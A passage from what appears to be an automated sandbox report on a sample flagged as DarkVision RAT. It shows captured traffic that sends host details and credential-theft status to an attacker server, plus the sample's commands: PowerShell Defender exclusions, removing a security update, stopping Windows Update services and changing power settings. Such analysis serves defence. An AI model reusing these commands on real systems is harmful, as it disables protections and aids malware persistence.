                                                                          2024-12-08 14:07:54 UTC402OUTData Raw: 2d 2d 70 61 72 74 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 48 57 49 44 5f 37 39 35 33 65 34 63 37 39 62 38 62 64 65 61 32 32 64 36 31 66 37 33 36 65 36 31 64 34 33 63 62 0d 0a 2d 2d 70 61 72 74 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 6f 67 66 6f 6c 64 65 72 6e 61 6d 65 22 0d 0a 0d 0a 36 36 0d 0a 2d 2d 70 61 72 74 0d
                                                                          Data Ascii: --partContent-Type: text/plain; charset="UTF-8"Content-Disposition: form-data; name="hwid"HWID_7953e4c79b8bdea22d61f736e61d43cb--partContent-Type: text/plain; charset="UTF-8"Content-Disposition: form-data; name="logfoldername"66--part
                                                                          2024-12-08 14:07:54 UTC2OUTData Raw: 00 00
                                                                          Data Ascii:
                                                                          2024-12-08 14:07:54 UTC10OUTData Raw: 0d 0a 2d 2d 70 61 72 74 2d 2d
                                                                          Data Ascii: --part--
                                                                          2024-12-08 14:07:54 UTC231INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Sun, 08 Dec 2024 14:07:54 GMT
                                                                          Content-Type: text/plain;charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: PHP/8.3.14
                                                                          Vary: Accept-Encoding
                                                                          X-Powered-By: PleskLin
                                                                          2024-12-08 14:07:54 UTC11INData Raw: 31 0d 0a 31 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 110


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.649823154.216.20.2434436864C:\Windows\explorer.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 14:08:11 UTC234OUTPOST /upload.php HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=part
                                                                          Host: woo097878781.win
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                                          Content-Length: 538
                                                                          2024-12-08 14:08:11 UTC404OUTData Raw: 2d 2d 70 61 72 74 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 48 57 49 44 5f 37 39 35 33 65 34 63 37 39 62 38 62 64 65 61 32 32 64 36 31 66 37 33 36 65 36 31 64 34 33 63 62 0d 0a 2d 2d 70 61 72 74 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 6f 67 66 6f 6c 64 65 72 6e 61 6d 65 22 0d 0a 0d 0a 36 36 0d 0a 2d 2d 70 61 72 74 0d
                                                                          Data Ascii: --partContent-Type: text/plain; charset="UTF-8"Content-Disposition: form-data; name="hwid"HWID_7953e4c79b8bdea22d61f736e61d43cb--partContent-Type: text/plain; charset="UTF-8"Content-Disposition: form-data; name="logfoldername"66--part
                                                                          2024-12-08 14:08:11 UTC124OUTData Raw: 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 20 00 76 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 73 00 75 00 70 00 70 00 6f 00 72 00 74 00 73 00 20 00 46 00 6f 00 78 00 4d 00 61 00 69 00 6c 00 20 00 37 00 2e 00 32 00 20 00 77 00 68 00 69 00 63 00 68 00 20 00 77 00 61 00 73 00 20 00 6e 00 6f 00 74 00 20 00 66 00 6f 00 75 00 6e 00 64 00 2e 00 0d 00 0a 00 0d 00 0a 00 00 00
                                                                          Data Ascii: Current version supports FoxMail 7.2 which was not found.
                                                                          2024-12-08 14:08:11 UTC10OUTData Raw: 0d 0a 2d 2d 70 61 72 74 2d 2d
                                                                          Data Ascii: --part--
                                                                          2024-12-08 14:08:11 UTC231INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Sun, 08 Dec 2024 14:08:11 GMT
                                                                          Content-Type: text/plain;charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: PHP/8.3.14
                                                                          Vary: Accept-Encoding
                                                                          X-Powered-By: PleskLin
                                                                          2024-12-08 14:08:11 UTC11INData Raw: 31 0d 0a 31 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 110


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.649857154.216.20.2434436864C:\Windows\explorer.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 14:08:14 UTC234OUTPOST /upload.php HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=part
                                                                          Host: woo097878781.win
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                                          Content-Length: 533
                                                                          2024-12-08 14:08:14 UTC415OUTData Raw: 2d 2d 70 61 72 74 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 48 57 49 44 5f 37 39 35 33 65 34 63 37 39 62 38 62 64 65 61 32 32 64 36 31 66 37 33 36 65 36 31 64 34 33 63 62 0d 0a 2d 2d 70 61 72 74 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 6f 67 66 6f 6c 64 65 72 6e 61 6d 65 22 0d 0a 0d 0a 36 36 0d 0a 2d 2d 70 61 72 74 0d
                                                                          Data Ascii: --partContent-Type: text/plain; charset="UTF-8"Content-Disposition: form-data; name="hwid"HWID_7953e4c79b8bdea22d61f736e61d43cb--partContent-Type: text/plain; charset="UTF-8"Content-Disposition: form-data; name="logfoldername"66--part
                                                                          2024-12-08 14:08:14 UTC108OUTData Raw: 54 00 68 00 75 00 6e 00 64 00 65 00 72 00 42 00 69 00 72 00 64 00 20 00 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 20 00 52 00 65 00 63 00 6f 00 76 00 65 00 72 00 79 00 20 00 49 00 73 00 20 00 54 00 65 00 6d 00 70 00 6f 00 72 00 61 00 72 00 69 00 6c 00 79 00 20 00 44 00 69 00 73 00 61 00 62 00 6c 00 65 00 64 00 00 00
                                                                          Data Ascii: ThunderBird Password Recovery Is Temporarily Disabled
                                                                          2024-12-08 14:08:14 UTC10OUTData Raw: 0d 0a 2d 2d 70 61 72 74 2d 2d
                                                                          Data Ascii: --part--
                                                                          2024-12-08 14:08:14 UTC231INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Sun, 08 Dec 2024 14:08:14 GMT
                                                                          Content-Type: text/plain;charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: PHP/8.3.14
                                                                          Vary: Accept-Encoding
                                                                          X-Powered-By: PleskLin
                                                                          2024-12-08 14:08:14 UTC11INData Raw: 31 0d 0a 31 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 110


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.650012154.216.20.2434436196C:\Windows\explorer.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 14:09:46 UTC179OUTPOST /66/api/endpoint.php HTTP/1.1
                                                                          Accept: */*
                                                                          Connection: close
                                                                          Content-Length: 523
                                                                          Content-Type: application/json
                                                                          Host: woo097878781.win
                                                                          User-Agent: cpp-httplib/0.12.6
                                                                          2024-12-08 14:09:46 UTC523OUTData Raw: 7b 22 69 64 22 3a 22 6f 6d 73 69 68 6c 6f 79 77 66 61 6c 79 72 6f 62 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 36 34 38 33 35 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 36 34 38 33 35 31 22 2c 22 67 70 75 22 3a 22 4d 36 36 39 4c 41 38 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 31 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 65 78 70 6c 6f 72 65 72 2e 65 78 65 20 2d 20 50 72 6f
                                                                          Data Ascii: {"id":"omsihloywfalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Pro
                                                                          2024-12-08 14:09:47 UTC264INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Sun, 08 Dec 2024 14:09:46 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: PHP/8.3.14
                                                                          X-Robots-Tag: noindex, nofollow
                                                                          Vary: Accept-Encoding
                                                                          X-Powered-By: PleskLin
                                                                          2024-12-08 14:09:47 UTC12INData Raw: 32 0d 0a 7b 7d 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 2{}0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.2.650021154.216.20.2434436196C:\Windows\explorer.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 14:10:41 UTC179OUTPOST /66/api/endpoint.php HTTP/1.1
                                                                          Accept: */*
                                                                          Connection: close
                                                                          Content-Length: 523
                                                                          Content-Type: application/json
                                                                          Host: woo097878781.win
                                                                          User-Agent: cpp-httplib/0.12.6
                                                                          2024-12-08 14:10:41 UTC523OUTData Raw: 7b 22 69 64 22 3a 22 6f 6d 73 69 68 6c 6f 79 77 66 61 6c 79 72 6f 62 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 36 34 38 33 35 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 36 34 38 33 35 31 22 2c 22 67 70 75 22 3a 22 4d 36 36 39 4c 41 38 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 31 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 65 78 70 6c 6f 72 65 72 2e 65 78 65 20 2d 20 50 72 6f
                                                                          Data Ascii: {"id":"omsihloywfalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Pro
                                                                          2024-12-08 14:10:42 UTC264INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Sun, 08 Dec 2024 14:10:42 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: PHP/8.3.14
                                                                          X-Robots-Tag: noindex, nofollow
                                                                          Vary: Accept-Encoding
                                                                          X-Powered-By: PleskLin
                                                                          2024-12-08 14:10:42 UTC12INData Raw: 32 0d 0a 7b 7d 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 2{}0


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:09:07:00
                                                                          Start date:08/12/2024
                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                          Imagebase:0x7c0000
                                                                          File size:515'584 bytes
                                                                          MD5 hash:05BBEBA85B66E05630AB53ABE2F0864E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000000.00000000.2115394584.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.2115394584.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000000.00000003.2116236371.0000000002801000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.2116236371.0000000002801000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000000.00000002.2119261652.0000000002800000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2119261652.0000000002800000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:1
                                                                          Start time:09:07:00
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData'
                                                                          Imagebase:0x7ff6441f0000
                                                                          File size:289'792 bytes
                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:3
                                                                          Start time:09:07:00
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:4
                                                                          Start time:09:07:00
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\explorer.exe"
                                                                          Imagebase:0x7ff609140000
                                                                          File size:5'141'208 bytes
                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:5
                                                                          Start time:09:07:00
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData'
                                                                          Imagebase:0x7ff6e3d50000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:8
                                                                          Start time:09:07:28
                                                                          Start date:08/12/2024
                                                                          Path:C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" ""
                                                                          Imagebase:0x7ff60aa90000
                                                                          File size:2'590'208 bytes
                                                                          MD5 hash:FD863BAB145A20D25E45177DA0E56EFC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:9
                                                                          Start time:09:07:28
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                          Imagebase:0x7ff6e3d50000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:10
                                                                          Start time:09:07:28
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:11
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                          Imagebase:0x7ff6441f0000
                                                                          File size:289'792 bytes
                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:12
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\sc.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                          Imagebase:0x7ff7f82e0000
                                                                          File size:72'192 bytes
                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:13
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:14
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:15
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\wusa.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                          Imagebase:0x7ff6c27a0000
                                                                          File size:345'088 bytes
                                                                          MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:16
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\sc.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                          Imagebase:0x7ff7f82e0000
                                                                          File size:72'192 bytes
                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:17
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:18
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\sc.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                          Imagebase:0x7ff7f82e0000
                                                                          File size:72'192 bytes
                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:19
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:20
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\sc.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\sc.exe stop bits
                                                                          Imagebase:0x7ff7f82e0000
                                                                          File size:72'192 bytes
                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:21
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:22
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\sc.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                          Imagebase:0x7ff7f82e0000
                                                                          File size:72'192 bytes
                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:23
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:24
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                          Imagebase:0x7ff603010000
                                                                          File size:96'256 bytes
                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:25
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                          Imagebase:0x7ff603010000
                                                                          File size:96'256 bytes
                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:26
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
